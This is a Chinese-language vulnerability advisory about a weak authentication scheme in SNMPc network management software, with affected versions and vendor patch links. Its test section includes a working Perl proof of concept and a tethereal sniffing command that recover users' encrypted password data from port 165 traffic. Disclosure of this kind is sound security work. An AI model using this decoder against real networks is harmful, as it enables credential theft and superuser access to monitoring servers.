Castle Rock Computing SNMPc v5/v6未授权远程访问漏洞
发布日期:2003-08-25
更新日期:2003-08-29
受影响系统:Castle Rock Computing SNMPc 6.0.8
Castle Rock Computing SNMPc 6.0.5
Castle Rock Computing SNMPc 6.0
Castle Rock Computing SNMPc 5.1
不受影响系统:Castle Rock Computing SNMPc 5.1.9
描述:
BUGTRAQ ID:
8484
SNMPc是一款分布式网络管理系统,适合管理中小型网络。
SNMPc由于其弱验证协议实现,远程攻击者可以利用这个漏洞以超级用户权限访问SNMPc服务器。
SNMPc分布式系统包含多个组件,服务器组件执行集中化计算机和维护数据库,包括配配置,网络拓扑,事件日志文件和用户信息。用户必须启动远程登录控制台或JAVA控制台查看和控制SNMPc系统。不过远程控制使用的验证机制相当简单,所以验证基于客户端完成。在登录过程中,在几个初始化交换后远程控制台发送用户名到服务器,服务器就会发送包含在ntuserdb.dat文件中的用户数据如用户名,实际名,电话号码,用户组进行应答,也包含用户加密的密码信息。攻击者可以利用这个信息获得验证信息。
这个漏洞最终可使攻击者以超级用户权限访问SNMPc服务器。
<*来源:Alexander V. Nickolenko (
sawny@multimedia.ru)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106194495921713&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Alexander V. Nickolenko (
sawny@multimedia.ru)提供了如下测试方法:
#!/usr/bin/perl
$str='.YZ[\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-
./ !"#$%&\'................................................................................................................................';
while(<>){
$s="";
if(/^0130 /){
GETIT: { do {
s/^0130 00 00 // if /^0130/;
s/^[[:xdigit:]]{4} //;
s/ .*$//ms;
$s=$s." ".$_;
last GETIT if ($s =~ / 00/);
}while (<>) };
$s=~s/ 00.*$//ms;
$s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1)
/ige;
$s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;
print ":$s:\n";
}
}
并使用如下命令获得用户的加密密码信息:
"C:\Program Files\Ethereal\tethereal.exe" -lnV port 165 | C:\cygwin\bin\perl.exe 0wn-snmpc.pl
建议:
厂商补丁:
Castle Rock Computing
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
SNMPc version 6.0:
http://www.castlerock.com/download/fix821_608.zip (vers 6.0.8)
http://www.castlerock.com/download/fix821_605.zip (vers 6.0.5)
SNMPc version 5.1:
http://www.castlerock.com/download/snmpc519.exe浏览次数:3030
严重程度:0(网友投票)